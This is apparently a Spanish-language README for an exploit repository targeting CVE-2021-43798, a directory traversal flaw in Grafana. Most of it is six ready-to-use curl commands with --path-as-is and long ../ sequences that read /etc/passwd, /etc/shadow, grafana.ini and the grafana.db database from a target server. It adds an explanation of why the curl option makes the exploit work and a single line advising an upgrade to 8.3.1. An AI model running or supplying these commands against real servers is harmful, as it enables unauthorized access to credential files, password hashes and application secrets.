
Exploit para CVE-2021-43798, una vulnerabilidad de recorrido de directorios en Grafana, que permite la lectura arbitraria de archivos sin autenticación mediante comandos curl manipulados.
Este repositorio demuestra la explotación de CVE-2021-43798, una vulnerabilidad de directory traversal en Grafana. Esta vulnerabilidad permite a los atacantes leer archivos arbitrarios en el servidor.
Para explotar la vulnerabilidad manualmente, puedes usar uno de los siguientes comandos curl para intentar leer archivos sensibles:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
En el contexto de explotar la vulnerabilidad de directory traversal de Grafana CVE-2021-43798, la opción --path-as-is es esencial porque permite que las secuencias de traversal especialmente diseñadas (../../../../../) se envíen directamente al servidor sin modificación. Esto puede llevar a acceder a archivos sensibles en el servidor que están fuera del directorio previsto.
Sin --path-as-is, curl podría normalizar la ruta a algo como /public/plugins/Users/install.txt, lo que no explotaría la vulnerabilidad. Al usar --path-as-is, la secuencia de traversal exacta se conserva, permitiendo que el exploit tenga éxito.
Puedes encontrar más detalles sobre la opción --path-as-is en la documentación de curl. Al comprender y utilizar --path-as-is, los profesionales de seguridad e investigadores pueden demostrar y probar eficazmente las vulnerabilidades de directory traversal en aplicaciones web.
Para mitigar esta vulnerabilidad, actualiza Grafana a la versión 8.3.1 o posterior.